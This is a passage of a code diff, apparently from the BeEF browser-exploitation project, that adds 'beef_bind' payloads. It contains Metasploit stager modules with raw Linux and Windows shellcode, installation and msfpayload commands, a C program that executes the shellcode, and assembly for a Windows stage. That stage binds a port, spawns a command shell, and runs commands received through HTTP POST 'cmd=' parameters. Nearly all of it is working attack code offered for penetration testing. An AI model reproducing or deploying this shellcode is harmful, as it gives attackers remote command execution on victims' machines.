"\x0f\x05\x49\x89\xc6\x4c\x89\xff\x4c\x89\xf6\x66\xba\x00\x10\x6a" +
"\x00\x58\x0f\x05\x4c\x89\xff\x6a\x03\x58\x0f\x05\x4c\x89\xf6\x81" +
"\x3e\x63\x6d\x64\x3d\x74\x05\x48\xff\xc6\xeb\xf3\x6a\x04\x58\x48" +
"\x01\xc6\xff\xe6"
}
))
end
end

47
modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stager-linux-x86.rb Normal file
View File

@@ -0,0 +1,47 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'msf/core/handler/beef_bind'
module Metasploit3
include Msf::Payload::Stager
include Msf::Payload::Linux
def initialize(info = {})
super(merge_info(info,
'Name' => 'BeEF Bind HTTP Stager',
'Description' => 'Proxy web requests between a web browser and a shell',
'Author' => ['Bart Leppens'],
'License' => BSD_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_X86,
'Handler' => Msf::Handler::BeEFBind,
'Convention' => 'beef_bind',
'Stager' =>
{
'RequiresMidstager' => false,
'Offsets' => { 'LPORT' => [ 47, 'n' ] },
'Payload' =>
"\xfc\x31\xc0\x31\xd2\x6a\x01\x5b\x50\x40\x50\x40\x50\x89\xe1\x6a" +
"\x66\x58\xcd\x80\x89\xc6\x6a\x0e\x5b\x6a\x04\x54\x6a\x02\x6a\x01" +
"\x56\x89\xe1\x6a\x66\x58\xcd\x80\x6a\x02\x5b\x52\x68\x02\x00\x11" +
"\x5c\x89\xe1\x6a\x10\x51\x56\x89\xe1\x6a\x66\x58\xcd\x80\x43\x43" +
"\x53\x56\x89\xe1\x6a\x66\x58\xcd\x80\x43\x52\x52\x56\x89\xe1\x6a" +
"\x66\x58\xcd\x80\x96\x93\xb8\x06\x00\x00\x00\xcd\x80\x6a\x00\x68" +
"\xff\xff\xff\xff\x6a\x22\x6a\x07\x68\x00\x10\x00\x00\x6a\x00\x89" +
"\xe3\x6a\x5a\x58\xcd\x80\x89\xc7\x66\xba\x00\x10\x89\xf9\x89\xf3" +
"\x6a\x03\x58\xcd\x80\x6a\x06\x58\xcd\x80\x81\x3f\x63\x6d\x64\x3d" +
"\x74\x03\x47\xeb\xf5\x6a\x04\x58\x01\xc7\xff\xe7"
}
))
end
end

62
modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stager-windows-x86.rb Normal file
View File

@@ -0,0 +1,62 @@
##
# $Id: beef_bind-stager.rb 121018 Ty Miller @ Threat Intelligence$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'msf/core/handler/beef_bind'
module Metasploit3
include Msf::Payload::Stager
include Msf::Payload::Windows
def initialize(info = {})
super(merge_info(info,
'Name' => 'BeEF Bind HTTP Stager',
'Version' => '$Revision: 9179 $',
'Description' => 'Proxy web requests between a web browser and a shell',
'Author' => ['Ty Miller'],
'License' => BSD_LICENSE,
'Platform' => 'win',
'Arch' => ARCH_X86,
'Handler' => Msf::Handler::BeEFBind,
'Convention' => 'beef_bind',
'Stager' =>
{
'RequiresMidstager' => false,
'Offsets' => { 'LPORT' => [ 200, 'n' ] },
'Payload' =>
# Length: 299 bytes
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b" +
"\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0" +
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57" +
"\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01" +
"\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b" +
"\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4" +
"\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b" +
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24" +
"\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d" +
"\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07" +
"\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00" +
"\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff" +
"\xd5\x97\x31\xdb\x53\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57" +
"\x68\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5" +
"\x53\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x97\x68\x75\x6e\x4d" +
"\x61\xff\xd5\xbb\x00\x10\x00\x00\x6a\x40\x53\x53\x6a\x00\x68\x58" +
"\xa4\x53\xe5\xff\xd5\x89\xc6\x6a\x00\x53\x50\x57\x68\x02\xd9\xc8" +
"\x5f\xff\xd5\x57\x68\xc6\x96\x87\x52\xff\xd5\x81\x3e\x63\x6d\x64" +
"\x3d\x74\x03\x46\xeb\xf5\x83\xc6\x04\xff\xe6"
}
))
end
end

37
modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/instructions.txt Normal file
View File

@@ -0,0 +1,37 @@
Install into Metasploit on BackTrack:
cp beef_bind-handler.rb /pentest/exploits/framework3/lib/msf/core/handler/beef_bind.rb
cp beef_bind-stage-windows-x86.rb /pentest/exploits/framework3/modules/payloads/stages/windows/beef_shell.rb
cp beef_bind-stager-windows-x86.rb /pentest/exploits/framework3/modules/payloads/stagers/windows/beef_bind.rb
cp beef_bind-stage-linux-x86.rb /pentest/exploits/framework3/modules/payloads/stages/linux/x86/beef_shell.rb
cp beef_bind-stager-linux-x86.rb /pentest/exploits/framework3/modules/payloads/stagers/linux/x86/beef_bind.rb
cp beef_bind-stage-linux-x64.rb /pentest/exploits/framework3/modules/payloads/stages/linux/x64/beef_shell.rb
cp beef_bind-stager-linux-x64.rb /pentest/exploits/framework3/modules/payloads/stagers/linux/x64/beef_bind.rb
Check it works:
msfpayload -l | grep beef_bind
Get info on the payload:
msfpayload windows/beef_shell/beef_bind S
Dump stager and stage in C format:
msfpayload windows/beef_shell/beef_bind C
Dump stager in raw format:
msfpayload windows/beef_shell/beef_bind R > beef_bind-stager
Encode stager to remove nulls:
msfpayload windows/beef_shell/beef_bind R | msfencode -b '\x00'

12
modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/beef_bind_tcp-stage.asm Normal file
View File

@@ -0,0 +1,12 @@
[SECTION .text]
BITS 32
[ORG 0] ;code starts at offset 0
cld ;clear the direction flag
call start ;jump over block_api and push its address onto the stack
%include "src/block_api.asm"
start:
pop ebp ;pop the address of block_api into ebp for calling functions later
%include "src/block_beef_bind-stage.asm" ;setup web listener to proxy requests and responses to the shell

12
modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/beef_bind_tcp-stager.asm Normal file
View File

@@ -0,0 +1,12 @@
[SECTION .text]
BITS 32
[ORG 0] ;code starts at offset 0
cld ;clear the direction flag
call start ;jump over block_api and push its address onto the stack
%include "src/block_api.asm"
start:
pop ebp ;pop the address of block_api into ebp for calling functions later
%include "src/block_beef_bind-stager.asm" ;setup bind port, receive web request, locate stage, execute it

36
modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/socket.c Normal file
View File

@@ -0,0 +1,36 @@
/**
Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
Browser Exploitation Framework (BeEF) - http://beefproject.com
See the file 'doc/COPYING' for copying permission
A standalone version can be compiled with MinGW:
c:\MinGW\bin>gcc -o beefstager.exe beefstager.c
and then executed with:
c:\MinGW\bin>beefstager.exe 1234
or just with the default port 4444:
c:\MinGW\bin>beefstager.exe
**/
#include <stdlib.h>
char code[] = "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5F\x54\x68\x4C\x77\x26\x07\xFF\xD5\xB8\x90\x01\x00\x00\x29\xC4\x54\x50\x68\x29\x80\x6B\x00\xFF\xD5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF\xD5\x97\x31\xDB\x53\x68\x02\x00\x11\x5C\x89\xE6\x6A\x10\x56\x57\x68\xC2\xDB\x37\x67\xFF\xD5\x53\x57\x68\xB7\xE9\x38\xFF\xFF\xD5\x53\x53\x57\x68\x74\xEC\x3B\xE1\xFF\xD5\x57\x97\x68\x75\x6E\x4D\x61\xFF\xD5\xBB\x00\x10\x00\x00\x6A\x40\x53\x53\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x89\xC6\x6A\x00\x53\x50\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x57\x68\xC6\x96\x87\x52\xFF\xD5\x81\x3E\x63\x6D\x64\x3D\x74\x03\x46\xEB\xF5\x83\xC6\x04\xFF\xE6";
int main(int argc, char **argv)
{
if (argc == 2){
int port;
port = atoi(argv[1]);
if (port <= 0xFFFF){
code[200] = ((port & 0xFF00) >> 8) & 0xFF;
code[201] = ((port & 0xFF));
}
}
int (*func)();
func = (int (*)()) code;
(int)(*func)();
return 0;
}

97
modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_api.asm Normal file
View File

@@ -0,0 +1,97 @@
;-----------------------------------------------------------------------------;
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
; Version: 1.0 (24 July 2009)
; Size: 137 bytes
;-----------------------------------------------------------------------------;
[BITS 32]
; Input: The hash of the API to call and all its parameters must be pushed onto stack.
; Output: The return value from the API call will be in EAX.
; Clobbers: EAX, ECX and EDX (ala the normal stdcall calling convention)
; Un-Clobbered: EBX, ESI, EDI, ESP and EBP can be expected to remain un-clobbered.
; Note: This function assumes the direction flag has allready been cleared via a CLD instruction.
; Note: This function is unable to call forwarded exports.
api_call:
pushad ; We preserve all the registers for the caller, bar EAX and ECX.
mov ebp, esp ; Create a new stack frame
xor edx, edx ; Zero EDX
mov edx, [fs:edx+48] ; Get a pointer to the PEB
mov edx, [edx+12] ; Get PEB->Ldr
mov edx, [edx+20] ; Get the first module from the InMemoryOrder module list
next_mod: ;
mov esi, [edx+40] ; Get pointer to modules name (unicode string)
movzx ecx, word [edx+38] ; Set ECX to the length we want to check
xor edi, edi ; Clear EDI which will store the hash of the module name
loop_modname: ;
xor eax, eax ; Clear EAX
lodsb ; Read in the next byte of the name
cmp al, 'a' ; Some versions of Windows use lower case module names
jl not_lowercase ;
sub al, 0x20 ; If so normalise to uppercase
not_lowercase: ;
ror edi, 13 ; Rotate right our hash value
add edi, eax ; Add the next byte of the name
loop loop_modname ; Loop untill we have read enough
; We now have the module hash computed
push edx ; Save the current position in the module list for later
push edi ; Save the current module hash for later
; Proceed to itterate the export address table,
mov edx, [edx+16] ; Get this modules base address
mov eax, [edx+60] ; Get PE header
add eax, edx ; Add the modules base address
mov eax, [eax+120] ; Get export tables RVA
test eax, eax ; Test if no export address table is present
jz get_next_mod1 ; If no EAT present, process the next module
add eax, edx ; Add the modules base address
push eax ; Save the current modules EAT
mov ecx, [eax+24] ; Get the number of function names
mov ebx, [eax+32] ; Get the rva of the function names
add ebx, edx ; Add the modules base address
; Computing the module hash + function hash
get_next_func: ;
jecxz get_next_mod ; When we reach the start of the EAT (we search backwards), process the next module
dec ecx ; Decrement the function name counter
mov esi, [ebx+ecx*4] ; Get rva of next module name
add esi, edx ; Add the modules base address
xor edi, edi ; Clear EDI which will store the hash of the function name
; And compare it to the one we want
loop_funcname: ;
xor eax, eax ; Clear EAX
lodsb ; Read in the next byte of the ASCII function name
ror edi, 13 ; Rotate right our hash value
add edi, eax ; Add the next byte of the name
cmp al, ah ; Compare AL (the next byte from the name) to AH (null)
jne loop_funcname ; If we have not reached the null terminator, continue
add edi, [ebp-8] ; Add the current module hash to the function hash
cmp edi, [ebp+36] ; Compare the hash to the one we are searchnig for
jnz get_next_func ; Go compute the next function hash if we have not found it
; If found, fix up stack, call the function and then value else compute the next one...
pop eax ; Restore the current modules EAT
mov ebx, [eax+36] ; Get the ordinal table rva
add ebx, edx ; Add the modules base address
mov cx, [ebx+2*ecx] ; Get the desired functions ordinal
mov ebx, [eax+28] ; Get the function addresses table rva
add ebx, edx ; Add the modules base address
mov eax, [ebx+4*ecx] ; Get the desired functions RVA
add eax, edx ; Add the modules base address to get the functions actual VA
; We now fix up the stack and perform the call to the desired function...
finish:
mov [esp+36], eax ; Overwrite the old EAX value with the desired api address for the upcoming popad
pop ebx ; Clear off the current modules hash
pop ebx ; Clear off the current position in the module list
popad ; Restore all of the callers registers, bar EAX, ECX and EDX which are clobbered
pop ecx ; Pop off the origional return address our caller will have pushed
pop edx ; Pop off the hash value our caller will have pushed
push ecx ; Push back the correct return value
jmp eax ; Jump into the required function
; We now automagically return to the correct caller...
get_next_mod: ;
pop eax ; Pop off the current (now the previous) modules EAT
get_next_mod1: ;
pop edi ; Pop off the current (now the previous) modules hash
pop edx ; Restore our position in the module list
mov edx, [edx] ; Get the next module
jmp short next_mod ; Process this module

177
modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_beef_bind-stage.asm Normal file
View File

@@ -0,0 +1,177 @@
;-----------------------------------------------------------------------------;
; Author: Ty Miller @ Threat Intelligence
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
; Version: 1.0 (2nd December 2011)
;-----------------------------------------------------------------------------;
[BITS 32]
;INPUT: EBP is block_api.
%include "src/block_virtualalloc.asm"
; Input: None
; Output: EAX holds pointer to the start of buffer 0x1000 bytes, EBX holds value 0x1000
; Clobbers: EAX, EBX, ECX, EDX
mov esi, eax ; point esi to start of buffer, used as pseudo-frame pointer
%include "src/block_pipes.asm"
; Create pipes to redirect stage stdin, stdout, stderr
; Input: EBP is api_call
; Output:
; esp+00 child stdin read file descriptor (inherited)
; esp+04 child stdin write file descriptor (not inherited)
; esp+08 child stdout read file descriptor (not inherited)
; esp+12 child stdout write file descriptor (inherited)
; esp+16 lpPipeAttributes structure (not used after block - 12 bytes)
; Clobbers: EAX, EBX, ECX, EDI, ESP will decrement by 28 bytes
mov edi,esi ; save esi since it gets clobbered
%include "src/block_shell_pipes.asm"
; Create process with redirected stdin, stdout, stderr to our pipes
; Input:
; EBP is api_call
; esp+00 child stdin read file descriptor (inherited)
; esp+04 not used
; esp+08 not used
; esp+12 child stdout write file descriptor (inherited)
; Output: None.
; Clobbers: EAX, EBX, ECX, EDX, ESI, ESP will also be modified
mov esi,edi ; restore esi
ReadLoop: ; Read output from the child process
clear_buffer:
mov ecx,0xFF8 ; zero output buffer starting at esi+8 with 0xFF8 nulls
lea eax,[esi+8] ; point eax to start of command/output buffer
zero_buffer:
mov byte [eax],0 ; push a null dword
inc eax ; point to the next byte in the buffer
loop zero_buffer ; keep looping untill we have zeroed the buffer
response_headers:
push esi ; save pointer to start of buffer
lea edi,[esi+1048] ; set pointer to output buffer
call get_headers ; locate the static http response headers
db 'HTTP/1.1 200 OK', 0x0d, 0x0a, 'Content-Type: text/html', 0x0d, 0x0a, 'Access-Control-Allow-Origin: *', 0x0d, 0x0a, 'Content-Length: 3016', 0x0d, 0x0a, 0x0d, 0x0a
get_headers:
pop esi ; get pointer to response headers into esi
mov ecx, 98 ; length of http response headers
rep movsb ; move the http headers into the buffer
pop esi ; restore pointer to start of buffer
bind_port:
push esi ; save buffer pointer onto stack
%include "src/block_bind_tcp.asm" ;by here we will have performed the bind_tcp connection to setup our external web socket
; Input: EBP must be the address of 'api_call'.
; Output: EDI will be the newly connected clients socket
; Clobbers: EAX, EBX, ESI, EDI, ESP will also be modified (-0x1A0)
add esp, 0x1A0 ; restore stack pointer
pop esi ; restore buffer pointer
mov [esi], edi ; save external socket to buffer
recv: ; Receive the web request - must be a post request with command ending with a new line character
push byte 0 ; flags
push 0x400 ; allocated space for command (512 bytes)
mov ebx, esi ; start of our request/response memory buffer
add ebx, 8 ; start of our allocated command space
push ebx ; start of our allocated command space
push dword [esi] ; external socket
push 0x5FC8D902 ; hash( "ws2_32.dll", "recv" )
call ebp ; recv( external_socket, buffer, size, 0 );
find_cmd: ; Search for "cmd=" in the web request
mov edx, [esp+0x64] ; stage stdin read file descriptor (40)
mov ecx, 0x400 ; set ecx to be our buffer counter
next:
cmp dword [ebx], 0x3d646d63 ; check if ebx points to "cmd="
jz cmd_found ; if we found "cmd=" then parse the command
inc ebx ; point ebx to next char in request data
dec ecx ; dec our buffer counter
jecxz read_file_check ; if our counter is 0 then we found no command, so recv more data
jmp short next ; check next location for "cmd="
cmd_found: ; now pointing to start of our command - MAY fail if the command is cut off
add ebx, 0x03 ; starts off pointing at "cmd=" so add 3 (plus inc eax below) to point to command
next_cmd_char:
inc ebx ; move our command string pointer up one character
push ebx ; save command pointer to the stack
write_file:
push 0 ; pOverlapped = NULL
lea edi,[esi+1040] ; 4 bytes for bytes written
push edi ; pBytesWritten
push 1 ; nBytesToWrite
push ebx ; command string in buffer
mov ebx,[esp+70h] ; Child stdin
push ebx ; child stdin
push 0x5BAE572D ; hash(kernel32.dll, WriteFile)
call ebp ; WriteFile
pop ebx ; restore command pointer from the stack
cmp byte [ebx], 0x0a ; check if we have just sent a new line
jnz next_cmd_char ; if we haven't finished sending the cmd then send the next char, else we want to read the cmd output from internal stage socket
%include "src/block_sleep.asm"
; Input: None
; Output: None. Sleeps for x seconds
; Clobbers: None
read_file_check:
xor eax, eax ; zero eax
push eax ; lpBytesLeftThisMessage
lea ebx,[esi+4] ; address to output the result - num bytes available to read
push ebx ; lpTotalBytesAvail
push eax ; lpBytesRead
push eax ; nBufferSize
push eax ; lpBuffer
lea ebx,[esp+74h] ; child stdout read address
mov ebx, [ebx] ; child stdout read file descriptor
push ebx ; hNamedPipe
push 0xB33CB718 ; hash(kernel32.dll,PeekNamedPipe)
call ebp ; PeekNamedPipe
test eax, eax ; check the function return correctly
jz close_handle ; no, then close the connection and start again
mov eax, [esi+4] ; Grab the number of bytes available
test eax, eax ; check for no bytes to read
jz close_handle ; no, then close the connection and start again
read_file:
push 0 ; pOverlapped = NULL
lea edi,[esi+1044] ; output: number of bytes read
push edi ; pBytesRead
push 0xB86 ; BytesToRead: remaining space in our allocated buffer
;lea edi,[esi+1114] ; start of remaining space in buffer after response headers
lea edi,[esi+1146] ; start of remaining space in buffer after response headers
push edi ; start of remaining space in buffer after response headers
lea ebx,[esp+70h] ; child stdout read address
mov ebx, [ebx] ; child stdout read file descriptor
push ebx ; hFile: child stdout address
push 0xBB5F9EAD ; hash(kernel32.dll,ReadFile)
call ebp ; ReadFile
send_output: ; send buffer to the external socket
push byte 0 ; flags
push 0xBE8 ; len
lea edi,[esi+1048] ; start of output buffer
push edi ; pointer to buffer
push dword [esi] ; external socket
push 0x5F38EBC2 ; hash ( "ws2_32.dll", "send" )
call ebp ; send(external_socket, *buf, len, flags);
close_handle:
push dword [esi] ; hObject: external socket
push 0x528796C6 ; hash(kernel32.dll,CloseHandle)
call ebp ; CloseHandle
jmp ReadLoop

Some files were not shown because too many files have changed in this diff Show More